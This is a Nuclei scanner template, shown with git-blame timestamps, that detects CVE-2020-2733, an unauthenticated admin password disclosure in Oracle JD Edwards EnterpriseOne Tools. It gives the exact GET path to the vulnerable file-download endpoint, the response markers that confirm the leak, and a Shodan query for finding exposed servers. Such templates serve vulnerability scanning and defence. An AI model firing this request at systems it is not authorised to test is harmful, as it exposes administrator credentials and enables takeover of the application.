nuclei-templates/cves/2020/CVE-2020-2733.yaml

40 lines
1.3 KiB
YAML
Raw Normal View History

2022-09-21 10:10:52 +00:00
id: CVE-2020-2733
info:
2022-09-21 11:29:41 +00:00
name: JD Edwards EnterpriseOne Tools - Admin Password Disclosure
2022-09-21 10:10:52 +00:00
author: DhiyaneshDk,pussycat0x
severity: critical
2022-09-21 11:29:41 +00:00
description: |
Vulnerability in the JD Edwards EnterpriseOne Tools product of Oracle JD Edwards (component: Monitoring and Diagnostics). The supported version that is affected is 9.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise JD Edwards EnterpriseOne Tools. Successful attacks of this vulnerability can result in takeover of JD Edwards EnterpriseOne Tools.
2022-09-21 10:10:52 +00:00
reference:
- https://redrays.io/cve-2020-2733-jd-edwards/
- https://www.oracle.com/security-alerts/cpuapr2020.html
- https://nvd.nist.gov/vuln/detail/CVE-2020-2733
2022-09-21 11:29:41 +00:00
classification:
cve-id: CVE-2020-2733
2022-09-21 10:10:52 +00:00
metadata:
verified: true
2022-09-21 11:29:41 +00:00
shodan-query: port:8999 product:"Oracle WebLogic Server"
2022-09-22 10:04:43 +00:00
tags: cve,cve2020,oracle,weblogic,disclosure,exposure
2022-09-21 10:10:52 +00:00
requests:
- method: GET
path:
- '{{BaseURL}}/manage/fileDownloader?sec=1'
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'ACHCJK'
- type: word
part: header
words:
- "text/plain"
- type: status
status:
- 200